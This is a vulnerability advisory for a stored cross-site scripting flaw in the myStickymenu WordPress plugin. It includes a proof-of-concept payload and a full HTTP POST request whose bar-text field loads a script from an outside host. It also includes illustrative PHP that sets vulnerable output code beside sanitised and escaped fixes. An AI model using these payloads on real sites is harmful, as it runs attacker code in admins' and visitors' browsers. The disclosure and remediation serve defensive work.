WordPress Plugin Vulnerabilities
myStickymenu < 2.5.2 - Authenticated Stored XSS
Description
The plugin does not sanitise or escape its Bar Text setting, allowing high-privilege users to store malicious JavaScript in it, leading to a Stored Cross-Site Scripting issue that is triggered in the plugin's settings page as well as on every front-end page of the blog (when the Welcome bar is active).
Proof of Concept
Put the following payload in the Bar Text settings of the plugin and save them: </textarea><script>alert(/XSS/)</script>

PoC | Authenticated Persistent XSS | Welcome Bar > Bar Text:

POST /wp-admin/admin.php?page=my-stickymenu-welcomebar HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1634

mysticky_option_welcomebar%5Bmysticky_welcomebar_enable%5D=1&mysticky_option_welcomebar%5Bmysticky_welcomebar_position%5D=top&mysticky_option_welcomebar%5Bmysticky_welcomebar_bgcolor%5D=%2303ed96&mysticky_option_welcomebar%5Bmysticky_welcomebar_bgtxtcolor%5D=%23000000&mysticky_option_welcomebar%5Bmysticky_welcomebar_font%5D=Poppins&mysticky_option_welcomebar%5Bmysticky_welcomebar_fontsize%5D=14&mysticky_option_welcomebar%5Bmysticky_welcomebar_bar_text%5D=PoC%3C%2Ftextarea%3E--%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&mysticky_option_welcomebar%5Bmysticky_welcomebar_x_desktop%5D=desktop&mysticky_option_welcomebar%5Bmysticky_welcomebar_x_mobile%5D=mobile&mysticky_option_welcomebar%5Bmysticky_welcomebar_btn_desktop%5D=desktop&mysticky_option_welcomebar%5Bmysticky_welcomebar_btn_mobile%5D=mobile&mysticky_option_welcomebar%5Bmysticky_welcomebar_btncolor%5D=%23000000&mysticky_option_welcomebar%5Bmysticky_welcomebar_btntxtcolor%5D=%23ffffff&mysticky_option_welcomebar%5Bmysticky_welcomebar_btn_text%5D=Got+it%21&mysticky_option_welcomebar%5Bmysticky_welcomebar_attentionselect%5D=flash&mysticky_option_welcomebar%5Bmysticky_welcomebar_actionselect%5D=redirect_to_url&mysticky_option_welcomebar%5Bmysticky_welcomebar_redirect%5D=https%3A%2F%2Fwww.yourdomain.com&mysticky_option_welcomebar%5Bmysticky_welcomebar_aftersubmission%5D=dont_show_welcomebar&mysticky_option_welcomebar%5Bmysticky_welcomebar_triggersec_automatically%5D=0&mysticky_option_welcomebar%5Bmysticky_welcomebar_entry_effect%5D=slide-in&submit=Save&nonce=d70ad0b6ae&active_tab_element=1&save_welcome_bar=
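The defect class behind this advisory, as an added illustration that is not myStickymenu's own code (the function and option names are hypothetical): a setting echoed verbatim into a textarea and into the front-end bar, beside a version that sanitises on save and escapes on output using WordPress's own helpers.

```php
<?php
// Added illustrative example, not the plugin's code. Names are hypothetical;
// only the pattern (unsanitised option, unescaped output) matches the advisory.

// VULNERABLE pattern: the stored value is emitted inside a <textarea> and in
// the front-end bar with no escaping. A value starting with "</textarea>"
// closes the control, so a following <script> tag is rendered and executed.
function example_render_bar_text_vulnerable( $text ) {
    return '<textarea name="bar_text">' . $text . '</textarea>';
}

function example_render_front_bar_vulnerable( $text ) {
    return '<div class="welcome-bar">' . $text . '</div>';
}

// HARDENED, step 1: sanitise on save. wp_kses_post() keeps harmless markup
// (bold, links) but strips <script>, <iframe> and on* event attributes.
function example_sanitize_bar_text( $value ) {
    return wp_kses_post( (string) $value );
}

// HARDENED, step 2: escape on output for the exact context it lands in.
// esc_textarea() encodes <, > and &, so "</textarea>" can no longer close
// the control on the settings page.
function example_render_bar_text_fixed( $text ) {
    return '<textarea name="bar_text">' . esc_textarea( $text ) . '</textarea>';
}

// Front-end output allows formatting, so filter with wp_kses_post() again
// rather than trusting whatever reached the database.
function example_render_front_bar_fixed( $text ) {
    return '<div class="welcome-bar">' . wp_kses_post( $text ) . '</div>';
}

// Register the option with a sanitize_callback: WordPress then runs it on
// every save of this option, independent of which user submitted the form.
add_action( 'admin_init', function () {
    register_setting(
        'example_welcomebar_group',
        'example_welcomebar_option',
        array(
            'type'              => 'string',
            'sanitize_callback' => 'example_sanitize_bar_text',
        )
    );
} );
```

Sanitising on save alone is not enough: output escaping must still be applied per context, because a value that is harmless inside a textarea may not be harmless inside an attribute or a script block.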
Classification
Type: XSS
Miscellaneous
Original Researcher: m0ze
Submitter: m0ze
Verified: Yes
Timeline
Publicly Published: 2021-06-21
Added: 2021-06-28
Last Updated: 2022-03-05